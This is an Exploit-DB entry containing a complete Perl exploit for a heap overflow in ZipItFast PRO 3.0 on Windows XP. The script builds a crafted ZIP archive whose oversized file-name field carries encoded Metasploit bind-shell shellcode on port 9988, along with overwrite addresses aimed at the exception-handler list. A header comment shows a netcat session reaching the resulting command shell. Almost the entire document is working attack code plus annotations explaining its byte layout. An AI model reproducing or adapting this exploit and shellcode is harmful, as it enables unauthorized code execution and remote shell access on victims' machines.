ZipItFast PRO 3.0 - Local Heap Overflow

EDB-ID:

19776

CVE:



Author:

b33f

Type:

local


Platform:

Windows

Date:

2012-07-12


#!/usr/bin/perl

#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: https://www.exploit-db.com/apps/                                #
#           decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe               #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Documents and Settings\Owner\Desktop>                                  #
#---------------------------------------------------------------------------#

use strict;
use warnings;
 
# Output path, written relative to the current working directory.
my $filename = "Exploit.zip";

# Local file header (signature PK\x03\x04), 30 bytes; a single entry is
# described (the central-directory record below counts exactly one).
my $head = 
"\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00";
 
# Central directory file header (signature PK\x01\x02), 46 bytes. The pair
# \xe4\x0f at offset 28 is the little-endian file-name length, 0x0FE4 =
# 4068, which matches length($buf1) below (4064 + length ".txt").
my $head2 = 
"\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
 
# End of central directory record (signature PK\x05\x06): one entry on one
# disk, central directory size 0x1012 = 4114 = 46 + 4068 and offset
# 0x1002 = 4098 = 30 + 4068 (local header plus $buf1), no comment.
my $head3 = 
"\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
# Encoded payload bytes, kept verbatim. The length matches the 744 bytes
# the msfencode run above reported (53 lines of 14 bytes plus 2).
my $ph33r = 
"\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" .
"\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" .
"\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" .
"\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" .
"\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" .
"\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" .
"\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" .
"\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" .
"\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" .
"\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" .
"\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" .
"\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" .
"\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" .
"\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" .
"\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" .
"\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" .
"\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" .
"\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" .
"\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" .
"\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" .
"\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" .
"\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" .
"\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" .
"\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" .
"\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" .
"\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" .
"\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" .
"\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" .
"\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" .
"\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" .
"\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" .
"\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" .
"\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" .
"\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" .
"\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" .
"\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" .
"\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" .
"\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" .
"\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" .
"\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" .
"\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" .
"\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" .
"\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" .
"\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" .
"\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" .
"\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" .
"\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" .
"\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" .
"\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" .
"\x41\x41";

# Name of the archive entry as seen by the local file header: 4064 filler
# bytes followed by a ".txt" extension, 4068 bytes in total.
my $buf1 = join '', ('A') x 4064, '.txt';

#################
# EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink => EB 0A
#################
# Ten bytes placed after the \x90 run in $buf2: a two-byte short jump
# followed by the two little-endian addresses listed in the comment above.
my $magic = join '', "\xEB\x0A", "\x0C\x32\xFC\x77", "\x20\xFA\x12\x00";

##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = > !hidedebug All_Debug)
##################
# Name of the central-directory entry: a run of \x90 bytes, $magic, filler,
# the payload, more filler, then the ".txt" extension.
my $buf2 = join '',
    ("\x90" x 253),
    $magic,
    ("A" x 300),
    $ph33r,
    ("A" x 2756),
    ".txt";

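# Assemble the archive and write it out as raw bytes.
# binmode keeps the output byte-exact on platforms that would otherwise
# translate "\x0A" (the second byte of $magic) into "\x0D\x0A"; the close
# is checked because buffered write errors only surface there.
my $zip = $head . $buf1 . $head2 . $buf2 . $head3;
open(my $fh, '>', $filename) or die "[-]Error:\n$!\n";
binmode($fh);
print {$fh} $zip;
close($fh) or die "[-]Error:\n$!\n";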